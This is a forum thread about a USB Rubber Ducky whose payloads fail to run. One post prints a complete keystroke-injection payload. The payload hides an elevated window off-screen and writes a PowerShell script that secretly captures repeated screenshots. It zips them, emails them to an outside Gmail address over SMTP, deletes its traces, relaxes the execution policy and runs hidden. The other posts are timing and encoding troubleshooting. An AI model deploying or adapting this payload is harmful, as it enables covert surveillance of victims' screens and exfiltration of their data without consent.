Jump to content

What am I doing wrong? (32 bit Vista)


Recommended Posts

I created a payload through duck toolkit and I choose the e-mail options, I enter my information correctly and when I run the duck on the computer for some reason different payloads open random folders and I get no reports, I wanted screenshots sent to my e-mail several times but no luck, I tried creating different payloads but it wont work for some reason.

I drag and drop the bin file onto the SD card, insert into the ducky and put the ducky into the usb potr, but it runs really quickly despite slower delays like 30 extra seconds, proper keyboard layout (USA) and it's not working, any advice?

Link to comment
Share on other sites

Hi sorry for the dely in my reply.

So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time.

411.

Link to comment
Share on other sites

  • 2 weeks later...

Hi sorry for the dely in my reply.

So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time.

411.

The only payload that has worked is the Hello World payload, the rest will open random files and such.

Link to comment
Share on other sites

The only payload that has worked is the Hello World payload, the rest will open random files and such.

What payloads are you attempting to run that are causing you issues. would give us a better idea of what may be going on if we knew what the code should be doing.

Link to comment
Share on other sites

The only payload that has worked is the Hello World payload, the rest will open random files and such.

Have you tried again since i added the new delay feature?

You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue.

411.

Link to comment
Share on other sites


DELAY 2750

GUI r

DELAY 2750

STRING powershell Start-Process notepad -Verb runAs

ENTER

DELAY 2750

ALT y

DELAY 2750

ENTER

ALT SPACE

DELAY 2750

STRING m

DELAY 2750

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

ENTER

STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')

ENTER

STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime

ENTER

STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory

ENTER

STRING $date = get-date

ENTER

STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"

ENTER

STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'

ENTER

STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"

ENTER

STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory

ENTER

STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth

ENTER

STRING $displayWidth = $displayInfo.ScreenWidth

ENTER

STRING $displayHeight = $displayInfo.ScreenHeight

ENTER

STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")

ENTER

STRING $x = 0

ENTER

STRING do { Start-Sleep -Seconds 60

ENTER

STRING $jpegName = (get-date).ToString('HHmmss')

ENTER

STRING $image = new-object System.Drawing.Bitmap 1366 ,768

ENTER

STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight

ENTER

STRING $screen = [System.Drawing.Graphics]::FromImage($image)

ENTER

STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))

ENTER

STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));

ENTER

STRING $x++ } while ($x -ne 15);

ENTER

STRING $Report >> $fileSaveDir'/ComputerInfo.html'

ENTER

STRING function copy-ToZip($fileSaveDir){

ENTER

STRING $srcdir = $fileSaveDir

ENTER

STRING $zipFile = 'C:\Windows\Report.zip'

ENTER

STRING if(-not (test-path($zipFile))) {

ENTER

STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

ENTER

STRING (dir $zipFile).IsReadOnly = $false}

ENTER

STRING $shellApplication = new-object -com shell.application

ENTER

STRING $zipPackage = $shellApplication.NameSpace($zipFile)

ENTER

STRING $files = Get-ChildItem -Path $srcdir

ENTER

STRING foreach($file in $files) {

ENTER

STRING $zipPackage.CopyHere($file.FullName)

ENTER

STRING while($zipPackage.Items().Item($file.name) -eq $null){

ENTER

STRING Start-sleep -seconds 1 }}}

ENTER

STRING copy-ToZip($fileSaveDir)

ENTER

STRING $SMTPServer = 'smtp.gmail.com'

ENTER

STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

ENTER

STRING $SMTPInfo.EnableSsl = $true

ENTER

STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(''secret', 'secretpassword');

ENTER

STRING $ReportEmail = New-Object System.Net.Mail.MailMessage

ENTER

STRING $ReportEmail.From = ''secretemailhere@gmail.com''

ENTER

STRING $ReportEmail.To.Add('secretemailhere@gmail.com')

ENTER

STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report'

ENTER

STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.'

ENTER

STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip')

ENTER

STRING $SMTPInfo.Send($ReportEmail)

ENTER

STRING remove-item $fileSaveDir -recurse

ENTER

STRING remove-item 'C:\Windows\Report.zip'

ENTER

STRING Remove-Item $MyINvocation.InvocationName

ENTER

CTRL S

DELAY 2750

STRING C:\Windows\config-5077a.ps1

ENTER

DELAY 2750

ALT F4

DELAY 2750

GUI r

DELAY 2750

STRING powershell Start-Process cmd -Verb runAs

ENTER

DELAY 2750

ALT y

DELAY 2750

STRING mode con:cols=14 lines=1

ENTER

ALT SPACE

DELAY 2750

STRING m

DELAY 2750

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

ENTER

STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

ENTER

DELAY 2750

STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1

ENTER

Link to comment
Share on other sites

  • 3 weeks later...

I get this error for just the screenshot with maximum delay selected from the duck toolkit website. 40000 united states, on my laptop. No idea why it doesnt work..

edit: thread title says 32 bit vista. I also tried on two separate computers, around 2010 laptops and a macbook air, no luck.

post-47338-0-56098200-1401165525_thumb.j

Edited by duckyman662
Link to comment
Share on other sites

If it is not a timing issue, try compiling the .bin file with the duckencoder online toolkit (411 created it. Works great and more reliable than the actual compiler.) Try that, and reformat the SD Card. That should work. If that doesn't work, then there may be a problem with your duck. Try pressing the button on the duck as well after a minute of the duck being plugged into the machine. That may mean the duck isn't properly recognised by the computer. The driver may not be installed correctly, or the duck may be faulty.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...